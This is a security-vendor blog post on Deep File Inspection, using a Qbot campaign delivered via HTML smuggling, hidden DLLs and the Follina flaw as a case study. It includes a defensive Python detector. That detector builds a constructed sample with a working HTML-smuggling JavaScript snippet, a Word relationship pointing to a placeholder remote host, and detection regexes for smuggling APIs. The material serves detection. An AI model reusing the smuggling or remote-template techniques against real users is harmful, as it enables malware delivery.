Empower Your Security Operations Team to Combat Emerging Threats
Given the modern threat landscape, security operations teams need tooling that overcomes the limitations inherent in conventional malware prevention solutions.
Defense-in-depth architectures and operating-system hardening have changed the threat landscape. Historically, single zero-click vulnerabilities were routinely discovered and exploited; today's defensive posture forces attackers to chain several exploitation techniques together to gain control of a target system. The spread of dynamic-analysis (sandbox) systems has also pushed attackers toward evasion that depends on input or action from the user. The victim may have to perform several manual steps before the underlying payload activates; until then it stays dormant and invisible to behavioral analysis.
Client-side attacks are the predominant vector for initial access. Web-browser- and email-based malware campaigns target users through phishing, social engineering, and exploitation. Ubiquitous productivity and business tools from vendors such as Adobe and Microsoft give attackers a wide choice of carrier formats. Well-developed social-engineering tactics, combined with a lack of security-awareness training, frequently result in users permitting the execution of embedded logic such as weaponized macros or other scripts. Analyzing these common malware carriers is time-consuming and tedious, and it requires expert skill. To adequately prevent, detect, and respond to these threats, an organization must augment this previously human-intensive process with automation.
Deep File Inspection (DFI) is one approach to easing the burden of continuous security monitoring. DFI is a static-analysis engine that inspects the file content carried inside application-layer (OSI Layer 7) protocols, automating much of the work a SOC analyst or security researcher would otherwise do by hand. Whatever evasive techniques a threat actor uses, DFI dissects the malicious carrier to expose embedded logic, semantic context, and metadata. Graphical lures that coerce the user (for example, an image telling them to enable content) are extracted and processed through a machine-vision layer, adding to the semantic context of the original file. Commonly used obfuscation and encoding mechanisms are discovered and decoded automatically.
A common concern for SOC analysts, IR teams, and security researchers is the limited context available to detection analytics. An inline intrusion prevention system has microseconds of time and kilobytes of analyzable data per decision. Intrusion detection systems can typically dig deeper, spending additional milliseconds to expose more data.
At the far end of the time-versus-depth trade-off is behavioral monitoring, or sandboxed execution. This class of solution detonates samples in a virtualized environment and records the system's behavior for threat detection; the process is both compute- and time-intensive, taking minutes to analyze each file. There is a middle ground in which a few additional seconds of static inspection provide detection opportunities that neither extreme offers.
Use Case: Qbot Malware Delivered via Follina and Malspam
An example of an evasive threat is the recent TA570 campaigns that delivered Qbot malware via thread-hijacked emails. This wave of malspam used two different methods to deliver the payload. The first used a Windows shortcut (LNK) to run a DLL that had the hidden attribute set. The second used a Word document that exploits the Follina vulnerability (CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT).
Figure 2. Recent Qbot threat sequence. Source: InQuest
The attached HTML file uses an old-fashioned JavaScript routine to convert an embedded base64 string into a zip archive and prompt the victim to download it (HTML smuggling). The extracted zip contains a disk image which, once mounted, shows either a shortcut alone or a shortcut together with a Word document. The shortcut executes the Qbot DLL, which sits in the same directory with the hidden attribute set; the Word document instead attempts to exploit the MSDT vulnerability and download the payload from a remote server.
Many solutions struggle to carve the zip archive out of the encoded HTML, extract the IMG file, and identify the weaponized contents. In this example, multiple threat signatures fire along the chain, from anomalies in the SMTP headers down to the hidden DLL or the Follina document.
Figure 3. Variety of signature alerts. Source: InQuest
Another useful approach to detection is retrospective analysis, or RetroHunting. Where DFI adds a new dimension of data, RetroHunting adds a new dimension of time: historical events are re-analyzed with current detection logic. The appearance of Follina and other zero-day vulnerabilities illustrates the value of this capability; samples that raised no alert when first seen can be detected once emerging threat intelligence and detection logic become available.
In addition to a library of predeveloped signatures, analysts can write their own YARA rules that combine strings, byte patterns, and regular expressions with flexible conditional logic.
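As an added example (not code from the original post, nor InQuest's product), the following Python script walks the delivery chain described above: it carves the base64-smuggled archive out of an HTML attachment, classifies each archive member by its magic bytes rather than its extension, reads the hidden attribute from the zip entry, and looks inside any Office document for the external oleObject or attachedTemplate relationship that Follina-style lures use to fetch a remote HTML document. The last step combines the per-layer findings with the kind of string, regex and conditional logic a YARA rule expresses, so one verdict requires several indicators at once. The sample HTML, archive, shortcut header, DLL stub and document are constructed inline; the real campaign wrapped the files in a disk image, which this example omits so it runs stand-alone on the standard library. All file names and the example.invalid URL are placeholders.

```python
import base64
import io
import re
import zipfile
from typing import Dict, List, Optional

ZIP_MAGIC = b"PK\x03\x04"
PE_MAGIC = b"MZ"
# Shell Link header: HeaderSize 0x4C then LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
FILE_ATTRIBUTE_HIDDEN = 0x02      # low byte of ZipInfo.external_attr on Windows-made archives
# Relationship types Follina-style lures use to pull a remote HTML document into Word.
REMOTE_REL_TYPES = ("/relationships/oleObject", "/relationships/attachedTemplate")

B64_RE = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
SMUGGLING_API_RE = re.compile(rb"atob\(|createObjectURL\(|\.download\s*=|msSaveOrOpenBlob")
REL_RE = re.compile(r"<Relationship\b([^>]*)>")
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def carve_base64_zip(html: bytes) -> Optional[bytes]:
    """Return the first long base64 blob in the HTML that decodes to a zip archive."""
    for m in B64_RE.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        if data.startswith(ZIP_MAGIC):
            return data
    return None


def docx_remote_targets(docx: bytes) -> List[str]:
    """External oleObject/attachedTemplate targets in any .rels part of an OOXML package."""
    targets: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in REL_RE.finditer(z.read(name).decode("utf-8", "replace")):
                a = dict(ATTR_RE.findall(rel.group(1)))
                if (a.get("TargetMode") == "External"
                        and a.get("Type", "").endswith(REMOTE_REL_TYPES)
                        and a.get("Target", "").lower().startswith(("http://", "https://"))):
                    targets.append(a["Target"])
    return targets


def inspect_archive(data: bytes) -> List[Dict]:
    """Classify each member by content, and record the hidden attribute of the zip entry."""
    members = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            body = z.read(info)
            m = {"name": info.filename, "kind": "other", "remote": [],
                 "hidden": bool(info.external_attr & FILE_ATTRIBUTE_HIDDEN)}
            if body.startswith(LNK_MAGIC):
                m["kind"] = "lnk"
            elif body.startswith(PE_MAGIC):
                m["kind"] = "pe"
            elif body.startswith(ZIP_MAGIC) and b"word/" in body:
                m["kind"] = "docx"
                m["remote"] = docx_remote_targets(body)
            members.append(m)
    return members


def classify(html: bytes) -> Dict[str, object]:
    """YARA-style conditions over the carved layers: each tag needs several indicators."""
    tags: List[str] = []
    archive = carve_base64_zip(html)
    members = inspect_archive(archive) if archive else []
    if archive and SMUGGLING_API_RE.search(html):
        tags.append("html_smuggling_zip")
    if any(m["kind"] == "lnk" for m in members) and any(
            m["kind"] == "pe" and m["hidden"] for m in members):
        tags.append("lnk_launches_hidden_pe")
    if any(m["remote"] for m in members):
        tags.append("docx_external_ole_or_template")
    return {"tags": tags, "members": members}


def build_sample_html() -> bytes:
    """Constructed lookalike of the chain: HTML -> base64 zip -> {LNK, hidden DLL, docx}."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?><Relationships '
            'xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument'
            '/2006/relationships/oleObject" Target="http://example.invalid/lure.html!" '
            'TargetMode="External"/></Relationships>')
    docx = io.BytesIO()
    with zipfile.ZipFile(docx, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Invoice.lnk", LNK_MAGIC + b"\x00" * 56)   # header only, no real target
        dll = zipfile.ZipInfo("note.dll")
        dll.external_attr = FILE_ATTRIBUTE_HIDDEN               # hidden, as on the real disk image
        z.writestr(dll, PE_MAGIC + b"\x00" * 62)                # DOS-header stub, not a real PE
        z.writestr("Invoice.docx", docx.getvalue())
    b64 = base64.b64encode(outer.getvalue()).decode()
    return (f'<html><body><script>var d="{b64}";'
            'var b=new Blob([Uint8Array.from(atob(d),c=>c.charCodeAt(0))],{type:"application/zip"});'
            'var a=document.createElement("a");a.href=URL.createObjectURL(b);'
            'a.download="Invoice.zip";a.click();</script></body></html>').encode()


if __name__ == "__main__":
    result = classify(build_sample_html())
    for m in result["members"]:
        print(f'{m["name"]:14} kind={m["kind"]:5} hidden={m["hidden"]} remote={m["remote"]}')
    print("tags:", result["tags"])
```

Running the script on the constructed sample yields all three tags. The design point is that none of the tags depends on a file extension or a single string: the shortcut is recognized by its header, the DLL by its DOS stub plus the hidden flag on the entry, and the document by the external relationship it would use to reach out, so renaming files or re-encoding the blob does not silence the checks.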
When confronted with novel attack techniques in the wild, security leaders must give their detection operations the means to overcome the limitations inherent in conventional malware prevention solutions. A free resource for testing the efficacy of a mail provider's security controls is the Email Security Assessment.
About the Author
Josiah Smith has almost a decade of experience in the realm of security. Before becoming a threat engineer, Josiah worked as a cyber operator, overseeing signature management and host-based detection programs. He spent several years in a room without windows, focusing on network detection, threat hunting, and IR investigations. He began his career as a member of the US Air Force, and most of his experience is with the DoD.